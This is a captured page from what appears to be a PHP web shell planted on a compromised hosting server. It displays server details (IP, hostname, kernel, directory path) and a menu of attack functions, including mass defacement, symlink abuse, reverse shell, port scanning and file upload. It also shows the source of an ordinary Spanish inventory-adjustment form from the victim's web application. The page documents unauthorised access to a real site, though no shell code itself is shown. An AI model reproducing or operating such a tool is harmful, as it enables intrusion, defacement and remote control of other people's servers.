Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
vendefacil
/
views
/
ajustes
/
Viewing: index.php
<?php include_once 'views/templates/header.php'; ?> <div class="card"> <div class="card-body"> <nav> <div class="nav nav-tabs" id="nav-tab" role="tablist"> <button class="nav-link active" id="nav-ajustes-tab" data-bs-toggle="tab" data-bs-target="#nav-ajustes" type="button" role="tab" aria-controls="nav-ajustes" aria-selected="true">Nuevo Ajuste</button> <button class="nav-link" id="nav-historial-tab" data-bs-toggle="tab" data-bs-target="#nav-historial" type="button" role="tab" aria-controls="nav-historial" aria-selected="false">Historial de Ajustes</button> </div> </nav> <div class="tab-content" id="nav-tabContent"> <!-- TAB NUEVO AJUSTE --> <div class="tab-pane fade show active p-3" id="nav-ajustes" role="tabpanel" aria-labelledby="nav-ajustes-tab" tabindex="0"> <form id="formulario" autocomplete="off"> <div class="row"> <!-- Buscar Producto --> <div class="col-md-6 mb-3"> <label>Buscar Producto <span class="text-danger">*</span></label> <div class="input-group"> <span class="input-group-text"><i class="fas fa-search"></i></span> <input type="text" class="form-control" id="buscarProducto" placeholder="Buscar por código o nombre"> <button class="btn btn-secondary" type="button" data-bs-toggle="modal" data-bs-target="#modalProducto"><i class="fas fa-list"></i> Seleccionar</button> <input type="hidden" id="id_producto" name="id_producto"> </div> <span class="text-danger fw-bold d-none" id="errorProducto"></span> </div> <!-- Producto Seleccionado Info --> <div class="col-md-6 mb-3"> <label>Producto Seleccionado / Stock Actual</label> <input type="text" class="form-control" id="producto_info" readonly disabled placeholder="Seleccione un producto"> <input type="hidden" id="stock_actual"> </div> <!-- Tipo --> <div class="col-md-4 mb-3"> <label>Tipo de Ajuste <span class="text-danger">*</span></label> <select class="form-control" name="tipo" id="tipo"> <option value="Entrada">Entrada (Sumar al stock)</option> <option value="Salida">Salida (Restar al stock)</option> </select> </div> <!-- Cantidad --> <div class="col-md-4 mb-3"> <label>Cantidad <span class="text-danger">*</span></label> <input type="number" class="form-control" name="cantidad" id="cantidad" placeholder="Cantidad" min="1"> </div> <!-- Motivo --> <div class="col-md-12 mb-3"> <label>Motivo <span class="text-danger">*</span></label> <textarea class="form-control" name="motivo" id="motivo" rows="3" placeholder="Ej. Inventario inicial, merma, producto dañado, ajuste manual..."></textarea> </div> </div> <div class="text-end"> <button type="button" class="btn btn-primary" id="btnAccion" onclick="procesarAjuste()">Procesar Ajuste</button> </div> </form> </div> <!-- TAB HISTORIAL --> <div class="tab-pane fade p-3" id="nav-historial" role="tabpanel" aria-labelledby="nav-historial-tab" tabindex="0"> <div class="table-responsive"> <table class="table table-bordered table-striped table-hover align-middle nowrap" id="tblHistorial" style="width: 100%;"> <thead> <tr> <th>#</th> <th>Producto</th> <th>Tipo</th> <th>Cantidad</th> <th>Motivo</th> <th>Usuario</th> <th>Fecha</th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </div> </div> </div> <?php include_once 'views/templates/footer.php'; ?>
Coded With 💗 by
0x6ick